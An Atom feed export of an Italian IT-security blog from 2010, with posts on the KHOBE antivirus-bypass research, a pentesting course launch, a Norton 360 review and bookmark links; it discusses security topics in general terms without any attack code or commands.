<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;CEMARH04fSp7ImA9WhRaFEg.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485</id><updated>2012-02-16T20:20:45.335-08:00</updated><category term="sandbox" /><category term="web application" /><category term="0day" /><category term="threat analysis" /><category term="tools" /><category term="rosi" /><category term="kaminsky" /><category term="fingerprint" /><category term="secure" /><category term="malware" /><category term="crisi" /><category term="penetration testing" /><category term="privacy" /><category term="vulnerabilità" /><category term="dns cache" /><category term="general" /><category term="sql injection" /><category term="cookie" /><category term="browsers" /><category term="iphone" /><category term="vbootkit" /><category term="web 2.0" /><category term="keylogger" /><category term="spam" /><category term="spyware" /><category term="single sign on" /><category term="windows" /><category term="xss" /><category term="sicurezza informatica" /><category term="conficker" /><category term="firewall" /><category term="sslsniff" /><category term="review" /><category term="roi" /><category term="sniffing" /><category term="patch" /><category term="linux" /><category term="facebook" /><category term="libri" /><category term="it security" /><category term="google sso" /><category term="information gathering" /><category term="auditing siti web" /><category term="symantec" /><category term="rootkit" /><category term="adware" /><category term="giornali" /><category term="norton360" /><category term="google chrome" /><category term="PHP" /><category term="eventi" /><category term="antivirus" /><category term="rogue" /><category term="dns" /><category term="eLearnSecurity" /><category term="google cina" /><category term="ipod" /><category term="ids" /><category term="sslstrip" /><category term="saml" /><category term="ssl" /><category term="surfjacking" /><category term="buffer overflow" /><category term="vulnerability assessment" /><category term="protezione dati" /><category term="md5" /><category term="threat modeling" /><category term="exploit" /><category term="certificati" /><title>Sicurezza Informatica Made in Italy</title><subtitle type="html">Because italians do it better...</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.armandoromeo.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.armandoromeo.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Armando Romeo</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>42</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/SicurezzaInformatica" /><feedburner:info uri="sicurezzainformatica" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>SicurezzaInformatica</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry><title type="text">Links for 2010-06-13 [del.icio.us]</title><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/aQyN8StOyKQ/zinhohsc" /><updated>2010-06-14T00:00:00-07:00</updated><id>http://del.icio.us/zinhohsc#2010-06-13</id><content type="html">&lt;ul&gt;
&lt;li&gt;&lt;a href="http://heideri.ch/jso/"&gt;HTML5 Security Cheatsheet&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/aQyN8StOyKQ" height="1" width="1"/&gt;</content><feedburner:origLink>http://del.icio.us/zinhohsc#2010-06-13</feedburner:origLink></entry><entry gd:etag="W/&quot;CUMASXw_eCp7ImA9WxFQE0s.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-5353674348378698023</id><published>2010-05-08T16:46:00.000-07:00</published><updated>2010-05-08T17:04:08.240-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-05-08T17:04:08.240-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><title>Un Malware che bypassa qualsiasi Antivirus</title><content type="html">Esatto! Come avrei potuto farmi scappare quel tipo di notizia che prediligo.&lt;br /&gt;
&lt;br /&gt;
Non perché io stia dalla parte dei ladri. In quel caso avrei l'indulto, scriverei libri e avrei le veline del settore della sicurezza in italia ai miei piedi. &lt;br /&gt;
&lt;br /&gt;
Quindi assodato che il mio primo obiettivo è quello di spingere affinchè ci sia più sicurezza vi riporto una recentissima ricerca di matousec.com denominata &lt;br /&gt;
KHOBE – 8.0 earthquake for Windows desktop security software&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Una sorta di race condition (per altro com un tasso abbastanza elevato di successo) infatti. permette ad un malware di bypassare tutti quegli antivirus che utilizzano la tecnica dell'SSDT hooking per interfacciarsi col kernel. Il caso vuole che il 90% degli antivirus in commercio usa questa tecnica.&lt;br /&gt;
&lt;br /&gt;
La ricerca ad alto contenuto tecnico (e veramente molto interessante) è &lt;a href="http://www.matousec.com/info/articles/khobe-8.0-earthquake-for-windows-desktop-security-software.php"&gt;disponibile qui&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Inutile dire che McAfee, Symantec e altre aziende dell'industria del &lt;span style="text-decoration: line-through;"&gt;marketing&lt;/span&gt; Anti-malware sono vulnerabili.&lt;br /&gt;
Una lista dei tool è la seguente (scusate, era troppo lunga e non mi entrava nella schermata):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_-FDKJTRMHR0/S-X3vga7czI/AAAAAAAAAE0/cuBSi-I6PNE/s1600/vulns.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="343" src="http://1.bp.blogspot.com/_-FDKJTRMHR0/S-X3vga7czI/AAAAAAAAAE0/cuBSi-I6PNE/s400/vulns.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-5353674348378698023?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/eIWwD6tJur3S7cnsvTntqP-Dqh4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eIWwD6tJur3S7cnsvTntqP-Dqh4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/eIWwD6tJur3S7cnsvTntqP-Dqh4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eIWwD6tJur3S7cnsvTntqP-Dqh4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=s2bRS0jpRAg:lwOMzGobIvg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=s2bRS0jpRAg:lwOMzGobIvg:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=s2bRS0jpRAg:lwOMzGobIvg:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=s2bRS0jpRAg:lwOMzGobIvg:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=s2bRS0jpRAg:lwOMzGobIvg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=s2bRS0jpRAg:lwOMzGobIvg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=s2bRS0jpRAg:lwOMzGobIvg:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=s2bRS0jpRAg:lwOMzGobIvg:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/s2bRS0jpRAg" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5353674348378698023?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/5353674348378698023?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/s2bRS0jpRAg/un-malware-che-bypassa-qualsiasi.html" title="Un Malware che bypassa qualsiasi Antivirus" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_-FDKJTRMHR0/S-X3vga7czI/AAAAAAAAAE0/cuBSi-I6PNE/s72-c/vulns.jpg" height="72" width="72" /><feedburner:origLink>http://www.armandoromeo.com/2010/05/un-malware-che-bypassa-qualsiasi.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkQARXs8eCp7ImA9WxFRFk4.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-8378836644129963036</id><published>2010-04-30T02:20:00.001-07:00</published><updated>2010-04-30T05:25:44.570-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-30T05:25:44.570-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="penetration testing" /><category scheme="http://www.blogger.com/atom/ns#" term="eLearnSecurity" /><title>eLearnSecurity : Il primo corso di pentesting in italiano</title><content type="html">In Italia il penetration testing è sinonimo di Tiger Team. Il tiger team è sinonimo di "oh mio dio".&lt;br /&gt;Nella sicurezza informatica ci sono 2 casi in cui si arriva a imprecare:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Non hai assunto un tiger team e quindi ti hanno bucato&lt;/li&gt;&lt;li&gt;Quel tiger team che hai assunto ti ha bucato&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;E' chiaro quindi che il penetration test in Italia non esiste o è una pratica nuova su cui c'è ancora molta (giustificata) diffidenza. Del resto, se vuoi fare il penetration tester e ti senti un appestato sai anche &lt;a href="http://www.youtube.com/watch?v=-15dnZpzsoI"&gt;con chi prendertela&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Visto che il mercato del penetration testing in Italia quasi non esiste, ho deciso di scommetterci su, lanciando anche in italia il mio progetto &lt;span style="font-weight: bold;"&gt;eLearnSecurity&lt;/span&gt;, &lt;a href="http://www.ethicalhacker.net/content/view/307/24/"&gt;"Quello che CEH sarebbe dovuto essere"&lt;/a&gt;, un corso avanzato di penetration testing (o ethical hacking)  che sta riscuotendo un successo davvero inaspettato come si può leggere dal precedente link.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.elearnsecurity.com/images/BOX/box__prosmall.png"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 270px; height: 159px;" src="http://www.elearnsecurity.com/images/BOX/box__prosmall.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Il progetto vede come autori: il sottoscritto per la parte di Web Application Testing, Brett Arion per la parte di Network Security Testing e Vipin Kumar per la parte di System Security.&lt;br /&gt;&lt;br /&gt;E' possibile visionare una demo del corso inserendo la propria email qui: &lt;a href="http://www.elearnsecurity.com/"&gt;http://www.elearnsecurity.com &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Il corso avrà una sua localizzazione italiana, contenuti tradotti e corsi dal vivo, che vuole essere più un tentativo di portare in Italia ciò che all'estero è prassi ormai consolidata (il Certified Ethical Hacker è diventato un corso certificato dal Department of Defense americano) che un modello di business: non c'è domanda. Sarà forse perché non c'è offerta? Scopriamolo.&lt;br /&gt;&lt;br /&gt;La sfida è un sasso nello stagno, un modo per conoscere nuove persone in Italia e perché no, un modo per cercare di far capire alle aziende che a volte l'attacco può essere la miglior difesa.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-8378836644129963036?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YQrK2r1jvHW0LB3juQhudM8jeiM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YQrK2r1jvHW0LB3juQhudM8jeiM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YQrK2r1jvHW0LB3juQhudM8jeiM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YQrK2r1jvHW0LB3juQhudM8jeiM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=58NK-GQOoSA:LBLA7Lrovvw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=58NK-GQOoSA:LBLA7Lrovvw:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=58NK-GQOoSA:LBLA7Lrovvw:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=58NK-GQOoSA:LBLA7Lrovvw:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=58NK-GQOoSA:LBLA7Lrovvw:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=58NK-GQOoSA:LBLA7Lrovvw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=58NK-GQOoSA:LBLA7Lrovvw:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=58NK-GQOoSA:LBLA7Lrovvw:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/58NK-GQOoSA" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8378836644129963036?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/8378836644129963036?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/58NK-GQOoSA/elearnsecurity-il-primo-corso-di.html" title="eLearnSecurity : Il primo corso di pentesting in italiano" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2010/04/elearnsecurity-il-primo-corso-di.html</feedburner:origLink></entry><entry><title type="text">Links for 2010-04-02 [del.icio.us]</title><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/uxwi0reYX00/zinhohsc" /><updated>2010-04-03T00:00:00-07:00</updated><id>http://del.icio.us/zinhohsc#2010-04-02</id><content type="html">&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.google.com/viewer?pli=1"&gt;Google Docs - Viewer&lt;/a&gt;&lt;br/&gt;
A secure PDF viewer&lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/uxwi0reYX00" height="1" width="1"/&gt;</content><feedburner:origLink>http://del.icio.us/zinhohsc#2010-04-02</feedburner:origLink></entry><entry gd:etag="W/&quot;DkUER3g-fCp7ImA9WxBaFUs.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-8775890946413336426</id><published>2010-03-25T14:50:00.000-07:00</published><updated>2010-03-25T17:43:26.654-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-25T17:43:26.654-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="norton360" /><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><category scheme="http://www.blogger.com/atom/ns#" term="review" /><title>Norton 360 - L'acquasanta recensita dal diavolo - Parte 1</title><content type="html">Non sono &lt;a href="http://www.armandoromeo.com/2008/12/proteggersi-senza-lantivirus.html"&gt;mai &lt;/a&gt;stato &lt;a href="http://www.armandoromeo.com/2008/12/come-volevasi-dimostrare.html"&gt;tenero&lt;/a&gt; coi &lt;a href="http://www.armandoromeo.com/2008/12/lantivirus-morto.html"&gt;vendor &lt;/a&gt;di AntiVirus.&lt;br /&gt;Li ho sempre considerati troppo lenti nella corsa all'ultimo malware e ho considerato l'approccio basato su signature obsoleto da almeno 5-7 anni.&lt;br /&gt;&lt;br /&gt;Tuttavia, a Symantec devo riconoscere il fegato di aver contattato per una review, un blogger che ha scritto ben 3 post Anti-Antivirus nell'ultimo anno. Bravi. Meritate un'altra chance.&lt;br /&gt;&lt;br /&gt;Ho ricevuto quindi una copia dell'ultima versione della suite &lt;a href="http://www.symantec.com/it/it/norton/360"&gt;&lt;span style="font-weight: bold;"&gt;Norton360 2010 &lt;/span&gt;&lt;/a&gt;(che sembra essere una delle più complete disponibili sul mercato) che ho potuto valutare per 2 settimane prima di comporre questa breve ma spero utile review.&lt;br /&gt;In estrema sintesi elenco i punti salienti della suite. Non me ne vogliate per la sintesi. Non è da &lt;a href="http://aranzulla.tecnologia.virgilio.it/libro-sicurezza-informatica"&gt;tutti&lt;/a&gt; scrivere libri su come installare un Antivirus.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Interfaccia&lt;br /&gt;&lt;/span&gt;Buona. Decisamente buona. Partiamo infatti dal vero scopo dei vendor di Antivirus negli ultimi 10 anni: offrire una buona interfaccia ai loro antivirus.&lt;br /&gt;Direi comunque che risulta estremamente semplice da utilizzare anche per i meno esperti e soprattutto occupa poca RAM. (Avranno mica letto i miei post?).&lt;br /&gt;Pochi effetti grafici, straight to the point, nessun fronzolo. Bravi.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_-FDKJTRMHR0/S6v5BElJbhI/AAAAAAAAAEA/6tHz4Af35mA/s1600/av2.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 248px;" src="http://3.bp.blogspot.com/_-FDKJTRMHR0/S6v5BElJbhI/AAAAAAAAAEA/6tHz4Af35mA/s400/av2.jpg" alt="" id="BLOGGER_PHOTO_ID_5452725570666851858" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Feature&lt;/span&gt;&lt;br /&gt;E' una suite. Ci trovate anche quello che non vi aspettereste/serve:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Antivirus (per fortuna)&lt;/li&gt;&lt;li&gt;Antispyware (come se gli spyware non fossero dei malware)&lt;/li&gt;&lt;li&gt;Protezione email/spam/phishing&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Firewall&lt;/li&gt;&lt;li&gt;Ottimizatore di prestazioni&lt;/li&gt;&lt;li&gt;Backup&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;E' veramente una suite a 360 gradi. Si intuisce che l'obiettivo è quello di costituire un UTM per l'endpoint (O detto senza gergo: un penso-a-tutto-io-te-stai-su-facebook).&lt;br /&gt;La sfida non è da poco ma è coerente con la tendenza ormai conoslidata di porre sempre più l'attenzione degli attacchi verso l'anello debole della catena: l'utente.&lt;br /&gt;Quindi ottime intenzioni. Bene. La classica visione olistica della sicurezza.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Firewall&lt;/span&gt;&lt;br /&gt;Il Firewall, mi desta qualche perplessità.&lt;br /&gt;Sebbene sia assolutamente possibile configurare regole per filtri in ingresso/uscita sui vari protocolli/porte (layer 3-4), a livello applicazione deficita un po.&lt;br /&gt;&lt;br /&gt;Di default ogni applicazione può accedere alla rete, cosa che non avviene con un personal firewall come &lt;a href="http://personalfirewall.comodo.com/"&gt;Comodo&lt;/a&gt; (che per altro è gratuito).&lt;br /&gt;L'utente non viene praticamente mai avvisato di eventuali connessioni in ingresso o in uscita da parte delle applicazioni.&lt;br /&gt;&lt;br /&gt;E' tuttavia possibile agire sulla singola applicazione definendone il livello d'accesso in maniera molto granulare,&lt;br /&gt;Il problema è: cosa pensa un utente medio? "Sono protetto, ho un Firewall. Eh wow, è così discreto che fa tutto senza chiedermi nulla".La realtà è un po diversa ed è il solito trade-off, incarnato dalla UAC di Microsoft:&lt;br /&gt;Security o Usability?&lt;br /&gt;&lt;br /&gt;Per intenderci, il Firewall di per sè è ottimo e molto flessibile, ma la protezione con la configurazione di default, per un utente medio potrebbe essere del tutto insufficiente.&lt;br /&gt;&lt;br /&gt;Onestamente, la protezione Firewall offerta dal gratuito Comodo, sembra migliore per l'utente medio.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Antivirus&lt;/span&gt;&lt;br /&gt;Norton è un Antivirus. Quindi offre il suo meglio quando gioca in casa.&lt;br /&gt;C'è poco da dire nel supporto alla rilevazione di threat basata su signature se non parlare della frequenza di aggiornamento (sigh).&lt;br /&gt;&lt;br /&gt;Rispetto ad altri antivirus offre un aggiornamento continuo delle definizioni (anche 10 volte al giorno), poichè queste vengono scaricate non in blocco bensì man mano che queste vengono aggiunte al database. E questo è sicuramante un punto a favore.&lt;br /&gt;&lt;br /&gt;La protezione è comprensiva di adware, spyware, keylogger e persino rootkit! (ora non pensiate di proteggervi dai rootkit avanzati quando ancora non esiste una protezione dagli 0-day).&lt;br /&gt;&lt;br /&gt;Inoltre mi sembra da elogiare l'attenzione posta sul phishing e lo spam.&lt;br /&gt;&lt;br /&gt;I canali di protezione sono i tradizionali:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Outlook (plugin)&lt;/li&gt;&lt;li&gt;Navigazione web (download e pagine visitate)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Office (documenti MS Word...)&lt;/li&gt;&lt;li&gt;Dischi removibili (usb drive, schede SD/MMC...)&lt;/li&gt;&lt;/ul&gt;Ma veniamo al sodo. Come ho già avuto modo di dire mille volte, l'approccio per definizioni va bene per minacce su larga scala ma è del tutto *inutile* per minacce serie, mirate (sento qualcuno dire &lt;a href="http://blogs.zdnet.com/security/?p=5691"&gt;APT&lt;/a&gt;, APT, APT...).&lt;br /&gt;&lt;br /&gt;Verizon, operatore mobile americano, risparmia in Belen, e coi soldi ci finanzia delle ottime ricerche nel campo della sicurezza e degli ottimi report sui data breach.&lt;br /&gt;L'annuale Verizon DBIR è ormai uno dei report di fine anno più attesi.&lt;br /&gt;Questo uno dei grafici inclusi nel &lt;a href="http://www.verizonbusiness.com/resources/security/reports/2009_databreach_rp.pdf"&gt;DBIR 2009&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_-FDKJTRMHR0/S6v2-0dBlZI/AAAAAAAAAD4/hYQQnzuVnq8/s1600/av1.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 400px; height: 209px;" src="http://2.bp.blogspot.com/_-FDKJTRMHR0/S6v2-0dBlZI/AAAAAAAAAD4/hYQQnzuVnq8/s400/av1.jpg" alt="" id="BLOGGER_PHOTO_ID_5452723332954822034" border="0" /&gt;&lt;/a&gt;Inutile commentare: c'è un forte incremento dell'uso di malware nei data breach. L'80% dei data breach nel 2008 ha interessato l'uso di malware. Nel 59% dei casi era un malware custom-made e per questo difficilmente rilevabile da un Antivirus.&lt;br /&gt;&lt;br /&gt;&lt;blockquote style="font-style: italic;"&gt;Most common in 2008, however, was malware that had (apparently) been created &lt;span style="font-weight: bold;"&gt;for the attack(s) entirely from scratch&lt;/span&gt;. In a rather sobering statistic, &lt;span style="font-weight: bold;"&gt;85 percent &lt;/span&gt;of the 285 million records breached in the year were harvested by custom-created malware&lt;/blockquote&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;Norton in questo senso impiega il cosiddetto &lt;a href="http://en.wikipedia.org/wiki/SONAR_%28Symantec%29"&gt;SONAR 2 &lt;/a&gt;. Tecnologia acquis-tata da Symantec nel 2005. Il SONAR si basa sul "comportamento" più che sulla signature ed ha fatto la sua prima apparizione nel 2008.&lt;br /&gt;&lt;br /&gt;2008? Si. Questa è la strada giusta da seguire anche se con una decade di ritardo.&lt;br /&gt;&lt;br /&gt;Da segnalare qualche falso positivo: tool che vengono segnalati come infetti quando non lo sono.&lt;br /&gt;Se poi siete un pentester con metasploit ed una miriade di altri tool del mestiere installati può diventare un vero inferno (in quel caso, la prima cosa da fare è configurare le esclusioni).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Conclusioni&lt;/span&gt;&lt;br /&gt;Norton360 mi sembra in fin dei conti una buona suite.&lt;br /&gt;Non essendo questa recensione una prova comparativa e mancando di test affidabili mi astengo da qualsiasi giudizio negativo. Tuttavia mi sembra di poter dire che forse i tempi sono maturi per nuove tecnologie di rilevazione degli attacchi che coinvolgano i recenti avanzamenti in termini di virtualizzazione.&lt;br /&gt;&lt;br /&gt;Lungi dall'essere la soluzione ad ogni problema di sicurezza desktop, Norton non richiede più un cluster di CPU, è di facile configurazione ed ha il giusto approccio alla sicurezza personale.&lt;br /&gt;A 360° appunto.&lt;br /&gt;&lt;br /&gt;Continuate così, siete ancora indietro ma sulla buona strada.&lt;br /&gt;&lt;br /&gt;[Nei prossimi giorni proporrò dei test su strada in cui mettere seriamente alla prova Norton, con malware customized]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
